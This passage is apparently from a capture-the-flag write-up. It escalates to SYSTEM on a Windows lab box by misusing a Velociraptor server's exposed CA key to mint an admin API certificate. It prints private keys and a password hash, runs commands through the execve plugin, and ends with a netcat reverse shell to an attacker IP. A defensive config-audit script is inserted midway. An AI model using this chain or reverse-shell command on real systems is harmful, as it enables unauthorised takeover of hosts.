    M3UfU1C1ihCiuYZWNZcFeiBODoQe40nqxBzAklAYtavagMyluP8zdnbnFek1ncDy
    IXIdIPv0COBLiJSUkQubcWVRG95mu/h/oMd4pI0CgYEAsknqS6hW32l1OwL75q7L
    Wt1amygxpunG5LHvCm2t/IYQwb7KQgiMuXM8kKwwjmqntHdU3DpP3agFq7iwnR7G
    DPTQ3DbNjDwwzOS1DXptpI7AC78bD8q3iLA3QmCpS7ZxqCoEp02q8WZ4st+++fyZ
    0gdANW0kyZcHN9Mp/aW72JMCgYEAhjImgxJndzEKSZIzWJYS9H/Bw7hh2bgh4EKN
    G2u1YkH1FEBJ6qzJWqqNcbtEbehHeC5EZIP4ZizdGVrc2ScPPaCV2ZPFHgNuKkLP
    LTuUi+6yT15xo7wfoOcl5PN++q8OwXYpnR1LS1/LU98usELJaPPUFpV8s+wBsVW1
    NY6W6LUCgYEA6kDkirjXD9JH6P3+L6k3HPnt9WIQYlBALpPtddBpTezGjNiJYI0L
    /GrDzvObjMKSBwwi0kwjKAlYz2TTRercnR5mxGvJP0oAUGH7LE4WNctJ9weSeHVv
    8k3Z45vLlh/YEZ8EomicZxJXOmZuzu+lVkQnsJncQrcHXb+eVIzQPjQ=
    -----END RSA PRIVATE KEY-----
Frontend:
  hostname: localhost
  bind_address: 0.0.0.0
  
<SNIP>

The server directory contains a server.config.yaml file that holds the certificates and the CA private key. This is Velociraptor's default layout at install time; the official documentation recommends removing these files for security reasons but does not enforce it:
Pasted image 20251001234421.png

With these certificates we can generate an API client key and then act as an administrator inside the application through the server API. The documentation can be followed for this.

Warning

One detail to watch is the --name parameter. If the supplied user name does not exist, the user is created in the database but the server has to be restarted before it is recognised. We cannot restart Velociraptor, so we need an existing user. One can be found in server.config.yaml: admin.

initial_users:
- name: admin
  password_hash: 43b7f91087b5a1bcb978d776a23330d3bf4a2c31017c0b1865ddae21c942e06d
  password_salt: 01e48c09468dcde741b493c49904cfdfcb4fa9a188efb27fa233e70265a6d4e5
authenticator:
  type: Basic
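The three settings this escalation relies on (the CA private key left in the file, the frontend bound to every interface, and an initial admin user with the Basic authenticator) are all visible from the config text alone, so they are worth checking on any Velociraptor server a team operates. The following added example (not code from the page or from the Velociraptor project) audits a server.config.yaml for them. It carries its own minimal flattener for the YAML subset the config uses, so it runs without third-party packages; SAMPLE_SERVER_CONFIG is a constructed fragment laid out like the file above, with placeholders in place of key material, hash and salt.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed fragment laid out like the server.config.yaml shown above; the
# key material, hash and salt are placeholders, not values from the box.
SAMPLE_SERVER_CONFIG = """\
Client:
  server_urls:
  - https://localhost:8000/
CA:
  private_key: |
    -----BEGIN RSA PRIVATE KEY-----
    PLACEHOLDER_CA_PRIVATE_KEY
    -----END RSA PRIVATE KEY-----
Frontend:
  hostname: localhost
  bind_address: 0.0.0.0
GUI:
  bind_address: 127.0.0.1
  initial_users:
  - name: admin
    password_hash: PLACEHOLDER_HASH
    password_salt: PLACEHOLDER_SALT
  authenticator:
    type: Basic
"""

_KEY = re.compile(r"^([A-Za-z_][\w-]*):(?:\s+(.*))?$")


def flatten_yaml(text: str) -> Dict[str, str]:
    """Flatten the YAML subset Velociraptor's config uses (nested maps, '- '
    list items, '|' block scalars) into {'dotted.path': value}. Not a general
    YAML parser; it only exists so the audit needs no third-party package."""
    out: Dict[str, str] = {}
    stack: List[Tuple[int, str, bool]] = []       # (indent, name, is_list_item)
    counters: Dict[str, int] = {}
    block: Optional[Tuple[str, int]] = None       # (path, indent) of an open '|' scalar
    block_lines: List[str] = []

    def path() -> str:
        return ".".join(name for _, name, _ in stack)

    for raw in text.splitlines():
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        if block is not None:                     # collect a '|' block scalar
            if line == "" or indent > block[1]:
                block_lines.append(line)
                continue
            out[block[0]] = "\n".join(block_lines).strip()
            block = None
        if not line or line.startswith("#"):
            continue
        item = line.startswith("- ")
        if item:
            line = line[2:].strip()
        while stack and stack[-1][0] > indent:    # leave deeper scopes
            stack.pop()
        while stack and stack[-1][0] == indent and (stack[-1][2] or not item):
            stack.pop()                           # leave sibling scopes
        m = _KEY.match(line)
        if item:
            parent = path()
            idx = counters.get(parent, 0)
            counters[parent] = idx + 1
            stack.append((indent, str(idx), True))
            if m is None:                         # plain scalar list entry
                out[path()] = line
                continue
            indent += 2                           # key on the item line is the item's child
        if m is None:
            continue
        key, value = m.group(1), m.group(2)
        full = f"{path()}.{key}" if stack else key
        if value is None:
            stack.append((indent, key, False))    # a nested map or list follows
        elif value in ("|", "|-", ">"):
            block, block_lines = (full, indent), []
        else:
            out[full] = value.strip().strip("'\"")
    if block is not None:
        out[block[0]] = "\n".join(block_lines).strip()
    return out


def audit_server_config(text: str) -> List[str]:
    """Report the weaknesses this section relies on, as human-readable findings."""
    cfg = flatten_yaml(text)
    findings: List[str] = []
    if "BEGIN" in cfg.get("CA.private_key", ""):
        findings.append("CA.private_key is stored in server.config.yaml: anyone who can read "
                        "the file can mint an API client certificate for any user and role")
    for key, value in cfg.items():
        if key.endswith(".bind_address") and value == "0.0.0.0":
            findings.append(f"{key} = 0.0.0.0 (listening on every interface)")
    users = sorted(v for k, v in cfg.items() if "initial_users." in k and k.endswith(".name"))
    if users and "Basic" in (v for k, v in cfg.items() if k.endswith("authenticator.type")):
        findings.append(f"Basic authenticator with initial_users {users}: their password "
                        "hashes and salts are readable from the same file")
    return findings


if __name__ == "__main__":
    for finding in audit_server_config(SAMPLE_SERVER_CONFIG):
        print("-", finding)
```

The config findings are only half of the check: the reason the escalation worked on this box is that a low-privileged account (sharesvc) could read the file at all, so the NTFS ACL on the VelociraptorServer folder should be reviewed alongside the config, and the CA private key removed from the server host as the documentation advises.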

Then generate an API key with the administrator role for the admin user:

c:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml
velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\config\inventory.json.db: open \\?\c:\datastore\config\inventory.json.db: Access is denied.
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\config\inventory.json.db: open \\?\c:\datastore\config\inventory.json.db: Access is denied.
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\config\inventory.json.db: open \\?\c:\datastore\config\inventory.json.db: Access is denied.
Creating API client file on c:\temp\api.config.yaml.
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\acl\admin.json.db: open \\?\c:\datastore\acl\admin.json.db: Access is denied.
velociraptor-v0.72.4-windows-amd64.exe: error: config api_client: Unable to set role ACL: open \\?\c:\datastore\acl\admin.json.db: Access is denied.

c:\Program Files\VelociraptorServer>dir c:\temp
dir c:\temp
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\temp

10/01/2025  08:50 AM    <DIR>          .
>>>> 10/01/2025  08:51 AM             4,305 api.config.yaml
               1 File(s)          4,305 bytes
               1 Dir(s)   4,739,252,224 bytes free

The errors say we lack permission to write the datastore, but the API config file itself was written:

c:\Program Files\VelociraptorServer>type c:\temp\api.config.yaml
type c:\temp\api.config.yaml
ca_certificate: |
  -----BEGIN CERTIFICATE-----
  MIIDSzCCAjOgAwIBAgIQIRnpQjrW1aIURqQbu2cKojANBgkqhkiG9w0BAQsFADAa
  MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjQwOTA2MTUzNDA0WhcNMzQw
  OTA0MTUzNDA0WjAaMRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwggEiMA0GCSqG
  SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDjJw2CgQEZOA4WGz2iSi2Wre432XHGPNmS
  SCb47TG3BIW7YPvD73frcEhhX2ixWLXPpfs7qQdMe9Zi5rV16RgXw25R9x13awU5
  1J/KUeNiMxmrQB9KSCUHO3e8kDEuLC0wV26K76TVX8KIm0vklJP4mpv7Mj9CgHBN
  4qGwTqB1y7h2wyTanUJlwasY/lGU5u7w4wj2z6+OOOA+/S9NEiJ3Sw+fcd+dma2C
  kzqFEYioa3GED+veIfu+OFRyWaO3Pce2gV57ZXnli3AhtQMoFb1w5l6O5IQzhrKU
  7inc3KSb8kG+2vzQB4jwGLU0+wbSkyckXY+5592uIG3tVvdy+L9bAgMBAAGjgYww
  gYkwDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
  AjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTfTRyiGGBqOr5F541v8pOYkcFz
  ADAoBgNVHREEITAfgh1WZWxvY2lyYXB0b3JfY2EudmVsb2NpZGV4LmNvbTANBgkq
  hkiG9w0BAQsFAAOCAQEAt4tFN1KZF1wrmhOT/1f0DXnwgaACkhJmC2HARfp46hGY
  FvqumxwNkUTc0hyPdwK2iy+57RCTS70CgGvsvSf6bDx7jSBpBJ8KzYXxOwcNRPaK
  4KJV7ZQQA2U6ax3c5LNuUupY63tRh7j/AgeVvnVP8CLTEvWTHD1kEQ/cTyn0XDSn
  7yINImANYuWJkWO6i9eKXYxTGXWhG+n1xEmQvZIed8SsOyt/pvTbFnUtKNTokUnb
  B71PNi/CkZRJpULuAk9eJvLgKhEgIeVpY2rxYvVPBJNqwWwGypKOzWGX0+ueQReQ
  is5cJn9DbPiu82yg/HdQu9vfroG+QktqdZgx5KJkxA==
  -----END CERTIFICATE-----
client_cert: |
  -----BEGIN CERTIFICATE-----
  MIIDPTCCAiWgAwIBAgIQeITZnz87Nbq0G4KDRXRrETANBgkqhkiG9w0BAQsFADAa
  MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjUxMDAxMTU1ODM0WhcNMzUw
  OTI5MTU1ODM0WjAnMRUwEwYDVQQKEwxWZWxvY2lyYXB0b3IxDjAMBgNVBAMTBWFk
  bWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4gbVwF2uacptUTmK
  QbBsKu10CDawirW5JqzLewl0ZczJGCdTH5nATi9KWNzO7DsIEfvUeSMFYgOrYxQ/
  mdsR8pKoEYgx5dhSINzVYcd2EiYQlw+kwU3HrPZ4hs6ANVrjNXcPjuOVNQl52+2l
  dLUuAhZLcpxlAy4cKnafOyIN9bF6Dh32P9rp7I4PrnqzjJZCfPinVABJNf3mi7lQ
  kkg6MXeWpf96xcW/ZELDtPGuSJnl2ZNr2Fmi1gwZ+XZWOynLxLMJHhjfSs1xQ7Z0
  QcJaDGuO1aAolpMPkk3u4oCEHMhjA+hIMBadJWzT4WSR/m1NISd3bWBhOZpsPHSD
  P2zGkQIDAQABo3IwcDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUH
  AwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHwYDVR0jBBgwFoAU300cohhgajq+
  ReeNb/KTmJHBcwAwEAYDVR0RBAkwB4IFYWRtaW4wDQYJKoZIhvcNAQELBQADggEB
  AOFb+5kqp8jCPhhf5yROfTfKFjNuE56Xp0+/ec/BTtIaQHzkrJmxoK3GI9X4Nco6
  jKG1EKdVlqv5pIPBc3tV8f+DTyNtEOAf37no7e3Rsc4Ff2iqx8Iqr5/VxXRNTMdm
  mH4WmOhodBEcXiOBvlHuBwbnnsPzwe8g91zfAj8ZWuFO3jENlK3uHVq0Cv7ipc2Y
  yo2BmXwq58eYYAYk7vNY4Pg/MUDCJSMplwDomiIU6mMfP/GUBaNQjGkTO5SlLril
  sONuLpwGZrNooNeLMvyMTAmikm5OQGc6CV1CXy1LYB/85qqVk6aS8/y/dqfeZMbG
  RANkBJW5tmfaF7MPqLsVHdY=
  -----END CERTIFICATE-----
client_private_key: |
  -----BEGIN RSA PRIVATE KEY-----
  MIIEowIBAAKCAQEA4gbVwF2uacptUTmKQbBsKu10CDawirW5JqzLewl0ZczJGCdT
  H5nATi9KWNzO7DsIEfvUeSMFYgOrYxQ/mdsR8pKoEYgx5dhSINzVYcd2EiYQlw+k
  wU3HrPZ4hs6ANVrjNXcPjuOVNQl52+2ldLUuAhZLcpxlAy4cKnafOyIN9bF6Dh32
  P9rp7I4PrnqzjJZCfPinVABJNf3mi7lQkkg6MXeWpf96xcW/ZELDtPGuSJnl2ZNr
  2Fmi1gwZ+XZWOynLxLMJHhjfSs1xQ7Z0QcJaDGuO1aAolpMPkk3u4oCEHMhjA+hI
  MBadJWzT4WSR/m1NISd3bWBhOZpsPHSDP2zGkQIDAQABAoIBAAIXChbzRs+XnZco
  rwyYcwealn4U82D0+TdQVblXhwoB8MIWawBZzZtreIaF1Cv/B74S1A4issQLQKRz
  5XqouevCS2eOGNgFPg0rvZVf4MmeLH0ZGe7npzcEOG0Wr7zOkFdIOI6bsB+DbOsJ
  sYP4wOooBp6Sr6Rt4rjJzAMh93sUGpf0+ZOa1kKE8+6wxGLb5sJdR5EGgHqzPoV9
  3xxFw7n8nSicdujU7XCnjvjyuVOFbVpYXysGztlwKvIGUm3hSP/jCWK+2a7FfkRx
  PddX2jZXqKre1A8xxxEdaSyqLEaBd/Tiwjv7wDmsqlQ+I2qarEp5tKnMNfz+faTz
  9vOoQRkCgYEA8jaTu//qN/HQFxQSiYz4qYgWcnI6BWlD5X+VbzvS9vkE8aMO6Qp6
  FgUlwoHPLDiTq0Lh2pynyI11Ui8DLijzhDABMrykdTELcJG6691YUTL4IrI+jcpX
  x7Y1TtrMqGnEkquHMg9TjBgmtfFf+iOhGaKU0F87AFZd7WMmR9RbD1MCgYEA7uRl
  P+tG7jz5xF74LznKiaLp1viOtjI6wV7F1/uvj116nAuMOwF9ZRzKXRQAmMVbMWQd
  6wuL4qDfR0l98sIRk/hgMOAWc43a6RDRKzU66KlYzevU9gkh0uN/lCt2oR2UGAK+
  ZTvN9kIgGHwSQVzfQV9QRUIo2TJz/Pi7Qy6SqgsCgYEAqndWyj12biE1vshVs5EP
  gOFSSwGxbBWFv4NnfH2yIDdqD1YfLEw/WDgPNzF8yTaYVzQfGGigfTlxlIGZz2bq
  2+GdNkQlyoTV9EfcMhv6CEvC70hbVhdOaDQImJLM7sphmog2AjlfJ33n4K0cS0PA
  IfaWnYAoWjhuqp/ZVTxTShkCgYBb2bkMQHv/MbaeyB0Im2HCVb8vBlZouxtYKgZL
  qtuvdbOkt9PtA/+gltc/vmcUVh1f+ix+qOvZ8RyoHhus8O0tRXxGjoJTX6FhpzOl
  N0w1FJeuZRR2nMBCg3IUGDn+bI76RGPMLJheLMKGZ33lX73/NpR4bJ2kFP//reri
  Q8/kTQKBgHyN04TXyHbrIGs89DtvdJu8H79OTb1rZXugvLajBiaG8x5lF2tphXdd
  1AdW7ItdXt/WvF+yag8CXJgNlD/g1buKNSoq1HOC4eLH8BK7Tds4rZVM9XjRAXfe
  1D8/XQV050OMzwaR9aaXUMWHU+xW/RViT8sLtCqaFneNbXUeE+iQ
  -----END RSA PRIVATE KEY-----
api_connection_string: localhost:8001
name: admin

Velociraptor has an execve plugin; commands can be run through it as described in the documentation:

c:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['whoami'])"
velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['whoami'])"
[
 {
  "Stdout": "nt authority\\system\r\n",
  "Stderr": "",
  "ReturnCode": 0,
  "Complete": true
 }
]

Pop a shell:

c:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['C:\\inetpub\\lushare\\nc.exe', '-e', 'cmd', '10.10.14.91', '4455'])"
velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['C:\\inetpub\\lushare\\nc.exe', '-e', 'cmd', '10.10.14.91', '4455'])"



┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# rlwrap nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.91] from (UNKNOWN) [10.129.193.58] 56742
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system